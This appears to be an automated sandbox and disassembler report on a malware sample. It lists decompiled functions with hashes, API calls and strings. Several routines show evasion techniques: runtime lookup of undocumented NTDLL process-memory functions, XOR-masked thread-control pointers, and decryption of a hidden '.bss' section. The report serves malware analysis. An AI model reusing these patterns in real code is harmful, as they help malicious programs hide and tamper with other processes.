Associated: 00000000.00000001.1467651208.00400000.00000002.sdmp Download File
Associated: 00000000.00000001.1468130389.0044D000.00000002.sdmp Download File
Associated: 00000000.00000001.1468513258.00469000.00000004.sdmp Download File
Associated: 00000000.00000001.1468552339.0046E000.00000002.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_1_400000_rb5iJg6pgN.jbxd

Yara matches

Similarity

API ID: ErrorHandling__87except__start
String ID: pow
API String ID: 2905807303-2276729525
Opcode ID: 24ec1484b68bd9d6fab8fdd9d7ee6824af4534042420f6f8751ef0b0186fdb80
Instruction ID: dd8b1723aa26243ec76bc7894ebcd5354da8cf45580c0a9c82f3e79be939a818
Opcode Fuzzy Hash: 24ec1484b68bd9d6fab8fdd9d7ee6824af4534042420f6f8751ef0b0186fdb80
Instruction Fuzzy Hash: FC5125A5A0830286EB197714C90137BAB949F44751F709D6FF891823B9EF3C88D5DA8F

Uniqueness

Uniqueness Score: -1,00%

Function 00404CD6, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 116COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00404CDB

Part of subcall function 00401979: __EH_prolog.LIBCMT ref: 0040197E

_memset.LIBCMT ref: 00404D1B
_wprintf.LIBCMT ref: 00404E1B

Strings

error: %s->%s, xrefs: 00404E16

Memory Dump Source

Source File: 00000000.00000001.1467662684.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000001.1467651208.00400000.00000002.sdmp Download File
Associated: 00000000.00000001.1468130389.0044D000.00000002.sdmp Download File
Associated: 00000000.00000001.1468513258.00469000.00000004.sdmp Download File
Associated: 00000000.00000001.1468552339.0046E000.00000002.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_1_400000_rb5iJg6pgN.jbxd

Yara matches

Similarity

API ID: H_prolog$_memset_wprintf
String ID: error: %s->%s
API String ID: 618565686-1530010421
Opcode ID: 7a10fbdc18e252173d6220ca47a99123c73102bcbf019dfd82fef874ad0b9db4
Instruction ID: b4f6e875b4acef283ac9faa494c19d9b3bf656e97873284a4c74bf1e2a141450
Opcode Fuzzy Hash: 7a10fbdc18e252173d6220ca47a99123c73102bcbf019dfd82fef874ad0b9db4
Instruction Fuzzy Hash: CF4183712042469FD724DB21C891FABB7E8EFC4348F00043EF685A7291EB78E945CB96

Uniqueness

Uniqueness Score: -1,00%

Function 00428B40, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 79COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 00428BE1
_memmove.LIBCMT ref: 00428BF9

Strings

Can't write sCAL (buffer too small), xrefs: 00428BB9
@, xrefs: 00428BB3

Memory Dump Source

Source File: 00000000.00000001.1467662684.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000001.1467651208.00400000.00000002.sdmp Download File
Associated: 00000000.00000001.1468130389.0044D000.00000002.sdmp Download File
Associated: 00000000.00000001.1468513258.00469000.00000004.sdmp Download File
Associated: 00000000.00000001.1468552339.0046E000.00000002.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_1_400000_rb5iJg6pgN.jbxd

Yara matches

Similarity

API ID: _memmove
String ID: @$Can't write sCAL (buffer too small)
API String ID: 4104443479-1859154924
Opcode ID: ff0931b01e15ef63f09eb11493aa974e3b3da168ed245c09fe0c7caadc1d33dd
Instruction ID: cdb7305a763bbc0cb275c2778cfcfc3e1e00c29e730cd335b72fd2a70e865f77
Opcode Fuzzy Hash: ff0931b01e15ef63f09eb11493aa974e3b3da168ed245c09fe0c7caadc1d33dd
Instruction Fuzzy Hash: B83125B5E0028C9FCF04DFD8D8859EEBBB5BF49308F14815EE819AB305D634AA05CB54

Uniqueness

Uniqueness Score: -1,00%

Function 004465E3, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 60
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E004465E3(char _a4, intOrPtr _a8) {
				intOrPtr _t12;
				short* _t28;

				_t28 = _a4;
				if(_t28 != 0 &&  *_t28 != 0 && E004460A8(_t28, ?str?) != 0) {
					if(E004460A8(_t28, ?str?) != 0) {
						return E0044B04A(_t28);
					}
					if(E004381D2(_a8 + 0x250, 0x2000000b,  &_a4, 2) == 0) {
						L9:
						return 0;
					}
					return _a4;
				}
				if(E004381D2(_a8 + 0x250, 0x20001004,  &_a4, 2) == 0) {
					goto L9;
				}
				_t12 = _a4;
				if(_t12 == 0) {
					return GetACP();
				}
				return _t12;
			}

0x004465e7
0x004465ec
0x00446614
0x00000000
0x00446642
0x00446634
0x00446665
0x00000000
0x00446665
0x00000000
0x00446636
0x00446663
0x00000000
0x00000000
0x00446669
0x0044666e
0x00446672
0x00446672
0x0044663b

APIs

_wcscmp.LIBCMT ref: 004465FA
_wcscmp.LIBCMT ref: 0044660B

Strings

ACP, xrefs: 004465F4
OCP, xrefs: 00446605

Memory Dump Source

Source File: 00000000.00000001.1467662684.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000001.1467651208.00400000.00000002.sdmp Download File
Associated: 00000000.00000001.1468130389.0044D000.00000002.sdmp Download File
Associated: 00000000.00000001.1468513258.00469000.00000004.sdmp Download File
Associated: 00000000.00000001.1468552339.0046E000.00000002.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_1_400000_rb5iJg6pgN.jbxd

Yara matches

Similarity

API ID: _wcscmp
String ID: ACP$OCP
API String ID: 856254489-711371036
Opcode ID: d43db08ae80c173e2beccadf71b40456073a074b6144e76533f0cf6bc924b379
Instruction ID: f3f594e8e8bf62a0c0645b0f56dcea8ee91cdbf25ac30283e11b77ad9ecc53d7
Opcode Fuzzy Hash: d43db08ae80c173e2beccadf71b40456073a074b6144e76533f0cf6bc924b379
Instruction Fuzzy Hash: E2019222600615AAFB20AE59DC42FD7339C9F16769F06401BFD04D6281FB3CE98186DE

Uniqueness

Uniqueness Score: -1,00%

Function 00402268, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 35
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 20%

			E00402268(void* __ecx, intOrPtr* __esi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				char _v8;
				char _v12;
				_Unknown_base(*)()* _t9;
				char _t16;
				intOrPtr* _t18;

				_t18 = __esi;
				_t9 =  *0x406484; // 0x0
				_t16 = 0;
				_v12 = 0;
				_v8 = 0;
				if(_t9 != 0) {
					L2:
					_push( &_v12);
					_push(_t16);
					_push(_a12);
					_push(_a8);
					_push( *((intOrPtr*)(_t18 + 4)));
					_push( *_t18);
					_push(_a4);
					if( *_t9() >= 0) {
						_t16 = _v12;
					}
					L4:
					return _t16;
				}
				_t9 = GetProcAddress(GetModuleHandleA("NTDLL.DLL"), "ZwWow64ReadVirtualMemory64");
				 *0x406484 = _t9;
				if(_t9 == 0) {
					goto L4;
				}
				goto L2;
			}

0x00402268
0x0040226d
0x00402273
0x00402277
0x0040227a
0x0040227d
0x0040229f
0x004022a2
0x004022a3
0x004022a4
0x004022a7
0x004022aa
0x004022ad
0x004022af
0x004022b6
0x004022b8
0x004022b8
0x004022bb
0x004022bf
0x004022bf
0x00402290
0x00402298
0x0040229d
0x00000000
0x00000000
0x00000000

APIs

GetModuleHandleA.KERNEL32(NTDLL.DLL,ZwWow64ReadVirtualMemory64,00000000,?,?,?,00402364,00000000,00000000,00000028,00000100,00000200), ref: 00402289
GetProcAddress.KERNEL32(00000000,?,?,?,00402364,00000000,00000000,00000028,00000100,00000200), ref: 00402290

Strings

ZwWow64ReadVirtualMemory64, xrefs: 0040227F
NTDLL.DLL, xrefs: 00402284

Memory Dump Source

Source File: 00000000.00000002.1499996558.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1499976703.00400000.00000002.sdmp Download File
Associated: 00000000.00000002.1500023558.00405000.00000002.sdmp Download File
Associated: 00000000.00000002.1500032102.00406000.00000004.sdmp Download File
Associated: 00000000.00000002.1500050558.00408000.00000002.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_rb5iJg6pgN.jbxd

Yara matches

Similarity

API ID: AddressHandleModuleProc
String ID: NTDLL.DLL$ZwWow64ReadVirtualMemory64
API String ID: 1646373207-3377366912
Opcode ID: 7e416b7201fadd89c4c51740670c1067d3e497d1996cf740971f7f6e0befb876
Instruction ID: d037bf5fae69f98613ce9e7fc59c2f685cce5c544686f65d7283b682d519b83b
Opcode Fuzzy Hash: 7e416b7201fadd89c4c51740670c1067d3e497d1996cf740971f7f6e0befb876
Instruction Fuzzy Hash: 17F09072A00204BFCF118FD5DE08C5EBBB9FF94340B10402AF905E22A0D6B0D950DB28

Uniqueness

Uniqueness Score: -1,00%

Function 004020F3, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 23
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 58%

			E004020F3(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				_Unknown_base(*)()* _t4;
				void* _t8;

				_t4 =  *0x406488; // 0x0
				_t8 = 0xc0000002;
				if(_t4 != 0) {
					L2:
					_t8 =  *_t4(_a4, 0, _a8, 0x30, _a12);
				} else {
					_t4 = GetProcAddress(GetModuleHandleA("NTDLL.DLL"), "ZwWow64QueryInformationProcess64");
					 *0x406488 = _t4;
					if(_t4 != 0) {
						goto L2;
					}
				}
				return _t8;
			}

0x004020f3
0x004020fb
0x00402100
0x00402122
0x00402134
0x00402102
0x00402113
0x0040211b
0x00402120
0x00000000
0x00000000
0x00402120
0x00402139

APIs

GetModuleHandleA.KERNEL32(NTDLL.DLL,ZwWow64QueryInformationProcess64,00000000,0040360B,00000000,?,C000009A,00000000,00000000,00000000), ref: 0040210C
GetProcAddress.KERNEL32(00000000), ref: 00402113

Strings

NTDLL.DLL, xrefs: 00402107
ZwWow64QueryInformationProcess64, xrefs: 00402102

Memory Dump Source

Source File: 00000000.00000002.1499996558.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1499976703.00400000.00000002.sdmp Download File
Associated: 00000000.00000002.1500023558.00405000.00000002.sdmp Download File
Associated: 00000000.00000002.1500032102.00406000.00000004.sdmp Download File
Associated: 00000000.00000002.1500050558.00408000.00000002.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_rb5iJg6pgN.jbxd

Yara matches

Similarity

API ID: AddressHandleModuleProc
String ID: NTDLL.DLL$ZwWow64QueryInformationProcess64
API String ID: 1646373207-3633144524
Opcode ID: 1385066d5ac969d0a7cc14966b917adba0f18d301a67c2715848a48a03d51521
Instruction ID: 260c967e728cbfa0fa37022e42548c78b1f8660427765c98f42b1e2eb3b93757
Opcode Fuzzy Hash: 1385066d5ac969d0a7cc14966b917adba0f18d301a67c2715848a48a03d51521
Instruction Fuzzy Hash: ACE01A32B04310AFDB219FA49E49F1B76A9AB58B40F15043ABA44F61E0C6749C549BAD

Uniqueness

Uniqueness Score: -1,00%

Function 00402FE4, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 14
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00402FE4() {
				signed int _t1;

				_t1 =  *0x4064f8; // 0xbd8e02e5
				if(_t1 != 0) {
				} else {
					 *0x4064f8 = GetProcAddress(GetModuleHandleA("KERNEL32.DLL"), "ResumeThread") ^ 0xcaba1a3a;
				}
				goto __eax;
			}

0x00402fe4
0x00402feb
0x00402fed
0x0040300c
0x0040300c
0x00403019

APIs

GetModuleHandleA.KERNEL32(KERNEL32.DLL,ResumeThread,00403980,?), ref: 00402FF7
GetProcAddress.KERNEL32(00000000), ref: 00402FFE

Strings

KERNEL32.DLL, xrefs: 00402FF2
ResumeThread, xrefs: 00402FED

Memory Dump Source

Source File: 00000000.00000002.1499996558.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1499976703.00400000.00000002.sdmp Download File
Associated: 00000000.00000002.1500023558.00405000.00000002.sdmp Download File
Associated: 00000000.00000002.1500032102.00406000.00000004.sdmp Download File
Associated: 00000000.00000002.1500050558.00408000.00000002.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_rb5iJg6pgN.jbxd

Yara matches

Similarity

API ID: AddressHandleModuleProc
String ID: KERNEL32.DLL$ResumeThread
API String ID: 1646373207-1399729241
Opcode ID: c250ebf6c895758f1a1fbe6d6483cc7cf2e976b6894678f481eba8d8f4d6a683
Instruction ID: 88da38128a554d97056d7a15467a4ae26c5960272ea57dc1f5d27216ab6c5af2
Opcode Fuzzy Hash: c250ebf6c895758f1a1fbe6d6483cc7cf2e976b6894678f481eba8d8f4d6a683
Instruction Fuzzy Hash: 03D0A7306092419FC7008F20FD58E16363CD708745315443EA113F71D0E638D8517B5E

Uniqueness

Uniqueness Score: -1,00%

Function 0040301B, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 14
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040301B() {
				signed int _t1;

				_t1 =  *0x4064fc; // 0x9b97b9af
				if(_t1 != 0) {
				} else {
					 *0x4064fc = GetProcAddress(GetModuleHandleA("KERNEL32.DLL"), "SuspendThread") ^ 0xeca13456;
				}
				goto __eax;
			}

0x0040301b
0x00403022
0x00403024
0x00403043
0x00403043
0x00403050

APIs

GetModuleHandleA.KERNEL32(KERNEL32.DLL,SuspendThread,0040391A,?), ref: 0040302E
GetProcAddress.KERNEL32(00000000), ref: 00403035

Strings

KERNEL32.DLL, xrefs: 00403029
SuspendThread, xrefs: 00403024

Memory Dump Source

Source File: 00000000.00000002.1499996558.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1499976703.00400000.00000002.sdmp Download File
Associated: 00000000.00000002.1500023558.00405000.00000002.sdmp Download File
Associated: 00000000.00000002.1500032102.00406000.00000004.sdmp Download File
Associated: 00000000.00000002.1500050558.00408000.00000002.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_rb5iJg6pgN.jbxd

Yara matches

Similarity

API ID: AddressHandleModuleProc
String ID: KERNEL32.DLL$SuspendThread
API String ID: 1646373207-488067803
Opcode ID: 956c4edf3939f53425485cd87c51a5be36ba17f4b6c7d020bd7b8471664d5447
Instruction ID: a718833c395915fda2b9cd54e09e98ef2d9fc6b98e3fe0f2821faa2083181a93
Opcode Fuzzy Hash: 956c4edf3939f53425485cd87c51a5be36ba17f4b6c7d020bd7b8471664d5447
Instruction Fuzzy Hash: 9ED0A7B0A0B2018BC7009F71AE49A1B391C9700712310843FA007F13D0EA3CE1144F4E

Uniqueness

Uniqueness Score: -1,00%

Function 0040218A, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 13
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040218A() {

				_t1 =  *0x406480;
				if( *0x406480 != 0) {
					L2:
					goto __eax;
				}
				_t1 = GetProcAddress(GetModuleHandleA("KERNEL32.DLL"), "Wow64EnableWow64FsRedirection");
				 *0x406480 = _t1;
				if(_t1 != 0) {
					goto L2;
				}
				return _t1;
			}

0x0040218a
0x00402191
0x004021b3
0x004021b3
0x004021b3
0x004021a4
0x004021ac
0x004021b1
0x00000000
0x00000000
0x004021b5

APIs

GetModuleHandleA.KERNEL32(KERNEL32.DLL,Wow64EnableWow64FsRedirection,00401A53,00000000,00000000,00000000,00000000,0000007E), ref: 0040219D
GetProcAddress.KERNEL32(00000000), ref: 004021A4

Strings

KERNEL32.DLL, xrefs: 00402198
Wow64EnableWow64FsRedirection, xrefs: 00402193

Memory Dump Source

Source File: 00000000.00000002.1499996558.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1499976703.00400000.00000002.sdmp Download File
Associated: 00000000.00000002.1500023558.00405000.00000002.sdmp Download File
Associated: 00000000.00000002.1500032102.00406000.00000004.sdmp Download File
Associated: 00000000.00000002.1500050558.00408000.00000002.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_rb5iJg6pgN.jbxd

Yara matches

Similarity

API ID: AddressHandleModuleProc
String ID: KERNEL32.DLL$Wow64EnableWow64FsRedirection
API String ID: 1646373207-2529553039
Opcode ID: b27ceec12b86abab9eb154498aaa1b0853b2e26358457508720c8d6dfcedff8b
Instruction ID: 1303fe8232ecd181d5591fb5636575d51fc258c83d06219b554d8a0298ecdb29
Opcode Fuzzy Hash: b27ceec12b86abab9eb154498aaa1b0853b2e26358457508720c8d6dfcedff8b
Instruction Fuzzy Hash: 52D0C9706542019EC7109B60AF4CF1B36B8AA14B453245536EA05F91D0D77894149A5D

Uniqueness

Uniqueness Score: -1,00%

Function 0042CFED, Relevance: 6.2, APIs: 4, Instructions: 200COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 0042D025
_memmove.LIBCMT ref: 0042D0BD
_memset.LIBCMT ref: 0042D1CA
_memset.LIBCMT ref: 0042D1FF

Memory Dump Source

Source File: 00000000.00000001.1467662684.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000001.1467651208.00400000.00000002.sdmp Download File
Associated: 00000000.00000001.1468130389.0044D000.00000002.sdmp Download File
Associated: 00000000.00000001.1468513258.00469000.00000004.sdmp Download File
Associated: 00000000.00000001.1468552339.0046E000.00000002.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_1_400000_rb5iJg6pgN.jbxd

Yara matches

Similarity

API ID: _memmove_memset
String ID:
API String ID: 3555123492-0
Opcode ID: ccfde0e8d44a6eca7f2364a6b6bce2ff480b7a89ce1c4817a75fea2809271af3
Instruction ID: 37b5f16ade128522b5d6d234283fa5adc0883a817000807910dbb1a4a296eb14
Opcode Fuzzy Hash: ccfde0e8d44a6eca7f2364a6b6bce2ff480b7a89ce1c4817a75fea2809271af3
Instruction Fuzzy Hash: A8816935A00B10DFC724CF69DA849AAB7F1FF98308B64492ED59283B21E779F951CB44

Uniqueness

Uniqueness Score: -1,00%

Function 00438A10, Relevance: 6.2, APIs: 4, Instructions: 162COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00438A6C
_memcpy_s.LIBCMT ref: 00438ADE
__filbuf.LIBCMT ref: 00438B5F
_memset.LIBCMT ref: 00438BA3

Part of subcall function 00437D6A: __getptd_noexit.LIBCMT ref: 00437D6A

Memory Dump Source

Source File: 00000000.00000001.1467662684.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000001.1467651208.00400000.00000002.sdmp Download File
Associated: 00000000.00000001.1468130389.0044D000.00000002.sdmp Download File
Associated: 00000000.00000001.1468513258.00469000.00000004.sdmp Download File
Associated: 00000000.00000001.1468552339.0046E000.00000002.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_1_400000_rb5iJg6pgN.jbxd

Yara matches

Similarity

API ID: _memset$__filbuf__getptd_noexit_memcpy_s
String ID:
API String ID: 3877424927-0
Opcode ID: ba59efde505d5fd18dd1d9274762c0c886e423a4973de48813a053021105746b
Instruction ID: 0bb9bf50ad706dc4461d7aea9129c61b556e2e3eb7ad2181258203178b9bb90d
Opcode Fuzzy Hash: ba59efde505d5fd18dd1d9274762c0c886e423a4973de48813a053021105746b
Instruction Fuzzy Hash: 3751C771A003069BDB249F69888056FF7A1AF48320F24972FF475973D1DF78AE518B49

Uniqueness

Uniqueness Score: -1,00%

Function 00404ABF, Relevance: 6.1, APIs: 4, Instructions: 145COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00404AC4
_fgetc.LIBCMT ref: 00404C2D

Memory Dump Source

Source File: 00000000.00000001.1467662684.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000001.1467651208.00400000.00000002.sdmp Download File
Associated: 00000000.00000001.1468130389.0044D000.00000002.sdmp Download File
Associated: 00000000.00000001.1468513258.00469000.00000004.sdmp Download File
Associated: 00000000.00000001.1468552339.0046E000.00000002.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_1_400000_rb5iJg6pgN.jbxd

Yara matches

Similarity

API ID: H_prolog_fgetc
String ID:
API String ID: 1315669789-0
Opcode ID: 28fd3f731314464f47d4056628012d7a97c69918027f3eb7da3f17067b2207c3
Instruction ID: 3ba9e8caa70254de53a5ac80d2a3481e0ff2147f9719e51e6b075bbc6d8dac2f
Opcode Fuzzy Hash: 28fd3f731314464f47d4056628012d7a97c69918027f3eb7da3f17067b2207c3
Instruction Fuzzy Hash: 51518FB1608306DFCB14DF29C480A6BB7F8AF89314F100A6FF991A7181D778E949CB56

Uniqueness

Uniqueness Score: -1,00%

Function 004368FD, Relevance: 6.1, APIs: 4, Instructions: 139
COMMON

Download Yara Rule

C-Code - Quality: 50%

			E004368FD(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				signed char* _t38;
				intOrPtr _t39;
				intOrPtr _t62;
				signed int _t63;
				signed char _t65;
				signed char _t66;
				intOrPtr _t88;
				signed char _t89;
				intOrPtr* _t91;
				signed char* _t94;
				intOrPtr _t95;
				void* _t96;

				_push(0xc);
				_push(0x4678c8);
				E004391D0(__ebx, __edi, __esi);
				_t62 = 0;
				_t38 =  *(_t96 + 0x10);
				_t65 = _t38[4];
				if(_t65 == 0 ||  *((intOrPtr*)(_t65 + 8)) == 0) {
					L27:
					_t39 = 0;
				} else {
					_t66 = _t38[8];
					if(_t66 != 0 || ( *_t38 & 0x80000000) != 0) {
						_t89 =  *_t38;
						_t91 =  *((intOrPtr*)(_t96 + 0xc));
						if(_t89 >= 0) {
							_t91 = _t91 + 0xc + _t66;
						}
						 *((intOrPtr*)(_t96 - 4)) = _t62;
						_push(1);
						if((_t89 & 0x00000008) == 0) {
							_t94 =  *(_t96 + 0x14);
							_t17 =  *((intOrPtr*)(_t96 + 8)) + 0x18; // 0x655ae8
							_push( *_t17);
							if(( *_t94 & 0x00000001) == 0) {
								if(_t94[0x18] != _t62) {
									if(L0043FFDD() == 0) {
										goto L25;
									} else {
										_push(1);
										if(L0043FFDD(_t91) == 0 || L0043FFDD(_t94[0x18]) == 0) {
											goto L25;
										} else {
											_t63 = 0;
											_t62 = (_t63 & 0xffffff00 | ( *_t94 & 0x00000004) != 0x00000000) + 1;
											 *((intOrPtr*)(_t96 - 0x1c)) = _t62;
										}
									}
								} else {
									if(L0043FFDD() == 0) {
										goto L25;
									} else {
										_push(1);
										if(L0043FFDD(_t91) == 0) {
											goto L25;
										} else {
											_t29 =  *((intOrPtr*)(_t96 + 8)) + 0x18; // 0x655ae8
											E00431990(_t91, E0043684A( *_t29,  &(_t94[8])), _t94[0x14]);
										}
									}
								}
							} else {
								if(L0043FFDD() == 0) {
									goto L25;
								} else {
									_push(1);
									if(L0043FFDD(_t91) == 0) {
										goto L25;
									} else {
										_t22 =  *((intOrPtr*)(_t96 + 8)) + 0x18; // 0x655ae8
										E00431990(_t91,  *_t22, _t94[0x14]);
										if(_t94[0x14] == 4 &&  *_t91 != 0) {
											_push( &(_t94[8]));
											_push( *_t91);
											goto L10;
										}
									}
								}
							}
						} else {
							_t95 =  *((intOrPtr*)(_t96 + 8));
							_t12 = _t95 + 0x18; // 0x655ae8
							if(L0043FFDD( *_t12) == 0) {
								L25:
								L0043BB80();
							} else {
								_push(1);
								if(L0043FFDD(_t91) == 0) {
									goto L25;
								} else {
									_t13 = _t95 + 0x18; // 0x655ae8
									_t88 =  *_t13;
									 *_t91 = _t88;
									_push( &(( *(_t96 + 0x14))[8]));
									_push(_t88);
									L10:
									 *_t91 = E0043684A();
								}
							}
						}
						 *((intOrPtr*)(_t96 - 4)) = 0xfffffffe;
						_t39 = _t62;
					} else {
						goto L27;
					}
				}
				return E00439215(_t39);
			}

0x004368fd
0x004368ff
0x00436904
0x00436909
0x0043690b
0x0043690e
0x00436913
0x00436a7a
0x00436a7a
0x00436922
0x00436922
0x00436927
0x00436935
0x00436937
0x0043693c
0x00436941
0x00436941
0x00436943
0x00436946
0x0043694b
0x0043698f
0x00436995
0x00436995
0x0043699b
0x004369ee
0x00436a32
0x00000000
0x00436a34
0x00436a34
0x00436a40
0x00000000
0x00436a4f
0x00436a54
0x00436a58
0x00436a59
0x00436a59
0x00436a40
0x004369f0
0x004369f9
0x00000000
0x004369fb
0x004369fb
0x00436a07
0x00000000
0x00436a09
0x00436a13
0x00436a1f
0x00436a24
0x00436a07
0x004369f9
0x0043699d
0x004369a6
0x00000000
0x004369ac
0x004369ac
0x004369b8
0x00000000
0x004369be
0x004369c4
0x004369c8
0x004369d4
0x004369e6
0x004369e7
0x00000000
0x004369e7
0x004369d4
0x004369b8
0x004369a6
0x0043694d
0x0043694d
0x00436950
0x0043695c
0x00436a5e
0x00436a5e
0x00436962
0x00436962
0x0043696e
0x00000000
0x00436974
0x00436974
0x00436974
0x00436977
0x0043697f
0x00436980
0x00436981
0x00436988
0x00436988
0x0043696e
0x0043695c
0x00436a63
0x00436a6a
0x00000000
0x00000000
0x00000000
0x00436927
0x00436a81

APIs

___AdjustPointer.LIBCMT ref: 00436981
_memmove.LIBCMT ref: 004369C8
___AdjustPointer.LIBCMT ref: 00436A16
_memmove.LIBCMT ref: 00436A1F

Memory Dump Source

Source File: 00000000.00000001.1467662684.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000001.1467651208.00400000.00000002.sdmp Download File
Associated: 00000000.00000001.1468130389.0044D000.00000002.sdmp Download File
Associated: 00000000.00000001.1468513258.00469000.00000004.sdmp Download File
Associated: 00000000.00000001.1468552339.0046E000.00000002.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_1_400000_rb5iJg6pgN.jbxd

Yara matches

Similarity

API ID: AdjustPointer_memmove
String ID:
API String ID: 1721217611-0
Opcode ID: c32433f06dfcdedb2c8c47cec2571170ec9d7129bd8863b7c7c63d0c0a7b2c81
Instruction ID: 5d26f99285d7755c6aef0a2485d02c66ad9b407d19e99f29382303f7d58fe34a
Opcode Fuzzy Hash: c32433f06dfcdedb2c8c47cec2571170ec9d7129bd8863b7c7c63d0c0a7b2c81
Instruction Fuzzy Hash: F8412831504303BEEB24AE15D852B2B33E1AF0E324F25E02FF9409A2D1DB7AD841DA5D

Uniqueness

Uniqueness Score: -1,00%

Function 00402C8D, Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 109
COMMON

Download Yara Rule

C-Code - Quality: 92%

			E00402C8D(signed int _a4) {
				signed int _v8;
				void* _v12;
				signed int _v16;
				intOrPtr _v20;
				signed int _v24;
				signed int _v32;
				signed int _v36;
				void* _t49;
				intOrPtr _t56;
				signed int _t59;
				void* _t62;
				intOrPtr _t63;
				signed int _t64;
				intOrPtr _t65;
				void* _t69;
				void* _t75;
				unsigned int _t77;
				intOrPtr _t78;
				signed int _t83;
				intOrPtr _t84;

				_t63 =  *0x40646c; // 0x400000
				_t1 = _t63 + 0x3c; // 0x100
				_v8 = _v8 & 0x00000000;
				_t49 =  *_t1 + _t63;
				_v20 = _t63;
				_t64 =  *(_t49 + 6) & 0x0000ffff;
				_t62 = ( *(_t49 + 0x14) & 0x0000ffff) + _t49 + 0x18;
				while( *((char*)(_t62 + 1)) != 0x62 ||  *((char*)(_t62 + 2)) != 0x73 ||  *((char*)(_t62 + 3)) != 0x73 ||  *((char*)(_t62 + 4)) != 0) {
					_t62 = _t62 + 0x28;
					_t64 = _t64 - 1;
					if(_t64 != 0) {
						continue;
					}
					L6:
					_v8 = 2;
					L7:
					return _v8;
				}
				if(_t62 == 0) {
					goto L6;
				}
				_t65 =  *((intOrPtr*)(_t62 + 0xc));
				if(_t65 == 0 ||  *(_t62 + 0x10) == 0) {
					_v8 = 0xc1;
					goto L7;
				} else {
					asm("movsd");
					asm("movsd");
					asm("movsd");
					_t83 = ( *(_t62 + 0x10) + _t65 ^ _v36 ^ _v32) + _a4;
					_t75 = E00401671( *(_t62 + 0x10));
					_v12 = _t75;
					if(_t75 == 0) {
						_v8 = 8;
						goto L7;
					}
					memcpy(_t75,  *((intOrPtr*)(_t62 + 0xc)) + _v20,  *(_t62 + 0x10));
					_v16 = _v16 & 0x00000000;
					_a4 = _a4 & 0x00000000;
					_t69 = _t75;
					_t77 =  *(_t62 + 0x10) >> 2;
					if(_t77 == 0) {
						L15:
						_t84 =  *((intOrPtr*)(_t62 + 0xc));
						_t78 = _v20;
						_t56 = E00402FA9(_v12 - _t84 - _t78 + 0x407197, 0xa);
						 *0x4064c4 = _t56;
						if(_t56 != 0x985e15fd) {
							_v8 = 6;
						} else {
							memcpy(_t84 + _t78, _v12,  *(_t62 + 0x10));
						}
						E00401686(_v12);
						goto L7;
					} else {
						goto L13;
					}
					while(1) {
						L13:
						_t59 =  *_t69;
						_v24 = _t59;
						if(_t59 == 0) {
							goto L15;
						}
						_a4 = _a4 + 1;
						asm("ror eax, cl");
						_v16 = _v24;
						 *_t69 = _t59 ^ _v16 ^ _t83;
						_t69 = _t69 + 4;
						_t77 = _t77 - 1;
						if(_t77 != 0) {
							continue;
						}
						goto L15;
					}
					goto L15;
				}
			}

0x00402c93
0x00402c99
0x00402c9c
0x00402ca0
0x00402ca8
0x00402cab
0x00402cb0
0x00402cb4
0x00402ccc
0x00402ccf
0x00402cd0
0x00000000
0x00000000
0x00402cd2
0x00402cd2
0x00402cd9
0x00402ce0
0x00402ce0
0x00402ce5
0x00000000
0x00000000
0x00402ce7
0x00402cec
0x00402dcb
0x00000000
0x00402cfc
0x00402d07
0x00402d08
0x00402d09
0x00402d14
0x00402d1c
0x00402d20
0x00402d23
0x00402dbf
0x00000000
0x00402dbf
0x00402d34
0x00402d39
0x00402d3d
0x00402d41
0x00402d49
